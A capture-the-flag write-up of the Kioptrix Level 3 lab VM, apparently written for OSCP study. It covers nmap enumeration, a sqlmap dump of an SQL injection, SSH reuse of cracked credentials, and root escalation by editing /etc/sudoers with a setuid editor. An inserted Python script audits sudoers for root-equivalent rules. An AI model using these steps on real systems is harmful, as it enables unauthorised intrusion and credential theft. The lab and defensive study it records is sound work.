Kioptrix: Level 3

I have 18 more days to prepare for OSCP.


Enumeration

I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0 

The box came back as 192.168.33.135, so I ran an nmap scan against it.

nmap -p- -sV -sS -T4 -A -oX Kioptrixlvl3.xml 192.168.33.135

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-18 18:53 EDT
Nmap scan report for 192.168.33.135
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:45:7D:DE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.33.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.48 seconds


Apache httpd port 80

Browsing to http://192.168.33.135/ I saw a blog, a login screen for LotusCMS, and a gallery.

I ran DirBuster to check for other pages.

I checked for phpMyAdmin, and it prompted me for a username and password.


Exploitation

I found a SQL injection vulnerability at this link:

http://kioptrix3.com/gallery/gallery.php?id=1

I used sqlmap to automate the SQL injection and to crack the hashes it extracted.

sqlmap --dump -u "http://kioptrix3.com/gallery/gallery.php?id=1"

I tried the credentials on phpMyAdmin and LotusCMS, but they didn't work.

Then I tried to log in over SSH with the gathered credentials, which worked this time.

Dreg and Loneferret both have limited shells, and only Loneferret has access to the web application files.

Using Loneferret's credentials I logged on to the server through SSH and found a file named CompanyPolicy.README.

I checked the contents of CompanyPolicy.README:

Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

I checked the location and permissions of ht.

whereis ht

ht: /usr/local/bin/ht

ls -l /usr/local/bin/ht

-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht

ht is a setuid-root binary, which means I can edit any file I want with it.

I tried to access /etc/sudoers.

cat /etc/sudoers

Obviously, permission denied.

I tried opening the file with sudo ht, but I got an error about the xterm-256 terminal type.

sudo ht

I fixed this by setting the TERM variable:

export TERM=xterm

I ran sudo ht again and opened /etc/sudoers.

Under the user privilege specification I added /bin/sh for Loneferret, then saved and exited.

Finally, I ran sudo /bin/sh.

sudo /bin/sh
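The root cause above is a sudo rule that hands a non-root user an editor running as root, which is the same as handing out root itself. As an added defender's check (example code, not part of the original write-up), here is a small Python audit that parses sudoers user-spec lines and flags commands like ht that amount to unrestricted root; the sample sudoers text is constructed for the example, modelled on the "sudo ht" policy above.

```python
"""Audit sudoers rules for commands that amount to an unrestricted root shell."""
import re

# Run as root, any of these can read/write arbitrary files or spawn a shell: full root.
FULL_ROOT_EQUIVALENT = {"ht", "vi", "vim", "nano", "less", "more", "sh", "bash", "dash", "tee"}
# user  host=(runas) [TAG:] cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

# Constructed sample (not copied from the box), modelled on the "sudo ht" policy above.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg    ALL=(ALL) /usr/bin/apt-get update
"""


def parse_sudoers(text):
    """Return (user, host, runas, [commands]) for each user-spec line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()                # drop comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"                 # sudo defaults to root
        cmds = [re.sub(r"^(?:[A-Z]+:\s*)+", "", c.strip())  # strip NOPASSWD: etc.
                for c in m.group("cmds").split(",")]
        rules.append((m.group("user"), m.group("host"), runas, cmds))
    return rules


def audit_sudoers(text):
    """Return (user, command, reason) for every rule granting root-equivalent access."""
    findings = []
    for user, _host, runas, cmds in parse_sudoers(text):
        if user == "root" or runas.split(":")[0].strip() not in ("root", "ALL"):
            continue                                       # root itself, or non-root runas
        for cmd in cmds:
            if not cmd or cmd.startswith("!"):
                continue                                   # a negated command grants nothing
            if cmd == "ALL":
                findings.append((user, cmd, "unrestricted root"))
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]       # basename of the program
            if prog in FULL_ROOT_EQUIVALENT:
                findings.append((user, cmd, f"{prog} as root can rewrite /etc/sudoers"))
    return findings
```

Running audit_sudoers(SAMPLE_SUDOERS) reports only the loneferret rule for /usr/local/bin/ht; the negated su entry and dreg's apt-get rule are not flagged.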


Extra

I found the credentials for phpMyAdmin under /home/www/kioptrix3.com/gallery/gconfig.php.

cat gconfig.php
